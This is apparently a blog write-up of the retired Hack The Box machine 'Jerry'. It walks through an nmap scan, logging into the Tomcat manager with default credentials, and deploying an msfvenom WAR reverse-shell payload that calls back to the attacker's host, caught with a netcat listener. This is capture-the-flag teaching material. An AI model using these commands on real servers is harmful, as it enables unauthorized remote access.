Jerry has retired and this is my write-up about it…
Jerry was one of the easiest boxes on HTB. It was a beginner-box .
It’s a windows box and its ip is 10.10.10.95
Starting with nmap to scan for tcp ports and services :
nmap -sV -sT 10.10.10.95
We can see that the port 8080 is open and running http and the server is Apache Tomcat.
By visiting it in the browser we get the default tomcat configuration page.
There’s a manager app so let’s try to access it .
It asks for authentication and common passwords like those mentioned below didn’t work:
So by closing the login panel it causes an error because we are not authorized to view the manager page
But by looking at the error page :
It shows these credentials :
This seems to be a part of the documentation and those credentials are dafault credentials.
Will they work ? yup !
Now we are logged in to the manager app and we can get a shell from here
We are on an apache tomcat server and apache tomcat uses WAR files.
To get a reverse shell we will use msfvenom to create the payload :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war
Then we will upload our payload to the server.
Then we will listen to the port with netcat :
nc -lvnp 4449
Now we got a reverse shell as admin so there’s no need for previlege escalation.
Another way to do this is to use this tool written by mgeeky TomcatWarDeployer to automate the process of getting a shell
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham
Thanks for reading.